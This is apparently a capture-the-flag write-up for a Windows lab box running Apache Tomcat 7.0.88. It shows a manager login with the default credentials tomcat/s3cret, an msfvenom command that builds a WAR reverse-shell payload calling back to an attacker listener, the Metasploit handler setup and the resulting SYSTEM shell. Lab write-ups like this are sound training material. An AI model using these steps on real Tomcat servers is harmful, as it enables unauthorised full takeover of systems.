Introduction

OS: Windows
Difficulty: Easy
Points: 0
Release: 30 Jun, 2018
IP: 10.10.10.95

Enumeration

Nmap scan result

Nmap scan report for 10.10.10.95
Host is up (0.050s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

An Apache Tomcat 7.0.88 server is running on port 8080.

User and Root Flag

We attempted to log in to the Tomcat manager page with default usernames and passwords.

After a few attempts we gained access with the username tomcat and the password s3cret.
Obtaining a reverse shell requires uploading a WAR reverse-shell payload to the Tomcat server through the manager application.

Metasploit command to create a WAR meterpreter payload:

msfvenom -p java/meterpreter/reverse_tcp lhost=10.10.14.xx lport=1111 -f war -o sh.war

Once the payload is uploaded, set up the listener before triggering the reverse shell in Tomcat.

I always use a meterpreter shell for Windows machines, but you can upload a shell that is not meterpreter as well.

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.xx:1111
[*] Sending stage (58829 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.xx:1111 -> 10.10.10.95:49195)

Then we got a shell as NT AUTHORITY\SYSTEM.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

C:\apache-tomcat-7.0.88>

Both the user and root flags are in the same file on the Administrator's desktop.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcefxxxxxx

root.txt
04a8b36e1xxxxxx